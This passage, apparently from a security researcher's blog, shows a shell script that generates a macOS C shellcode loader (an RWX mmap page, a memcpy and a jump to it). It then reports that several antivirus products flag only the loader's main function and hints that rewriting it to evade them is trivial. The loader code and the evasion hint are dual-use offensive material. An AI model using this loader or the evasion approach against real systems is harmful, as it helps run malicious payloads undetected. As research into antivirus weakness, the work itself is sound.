echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c 
echo '#include <stdint.h>' >> temp.c 
echo '' >> temp.c 
cat test.c >> temp.c 
echo '' >> temp.c
# the loader itself: map one RWX page, copy the shellcode in and jump to it
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'if (ptr == MAP_FAILED) { perror("mmap"); return 1; }' >> temp.c
echo 'printf("ret: %p\n", ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo 'return 0;' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payload.c generated ...'
ls -la osx64-payload.c
else
 echo '[-] Something went wrong .. '
exit 0
fi

And once I put the generated (on Linux) source code onto the MacOS box and compiled it via gcc, it got flagged immediately.

What is interesting is that no matter what is in the unsigned char/signed char buffer it gets flagged anyway, as you can see in the screenshot here

So Avast seems to be matching only the int main part of the loader; it does not even try to see what the shellcode does, any bogus data can be in the buffer. So now comes a 5 cent question: how hard is it to re-write the loader? :)

Hint .. about 5 seconds ?

Same goes for Bitdefender for MacOS

And Symantec AV

And Intego Mac Internet Security X9
